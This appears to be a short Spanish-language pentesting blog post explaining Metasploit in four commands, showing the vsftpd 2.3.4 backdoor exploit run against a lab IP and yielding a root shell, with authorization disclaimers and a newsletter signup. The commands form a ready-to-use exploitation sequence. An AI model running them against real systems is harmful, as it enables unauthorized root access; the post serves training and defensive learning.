~ / blog / pentesting
KALI

Metasploit en 60 segundos

Metasploit es el framework de explotación más famoso, y es más fácil de lo que crees.

Abres msfconsole, buscas un exploit para la versión vulnerable que encontraste, lo seleccionas con use, defines el objetivo con set RHOSTS, y lanzas con exploit. Si todo cuadra, obtienes una sesión, muchas veces directamente como root.

Cuatro comandos. Úsalo solo en laboratorios o con autorización por escrito.

# los comandos

kali@kali:~$ msfconsole -qcopiar
msf6 > search vsftpd 2.3.4copiar
exploit/unix/ftp/vsftpd_234_backdoor excellent
msf6 > use exploit/unix/ftp/vsftpd_234_backdoorcopiar
msf6 > set RHOSTS 10.0.0.5copiar
msf6 > exploitcopiar
[*] Command shell session 1 opened
$ idcopiar
uid=0(root) gid=0(root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.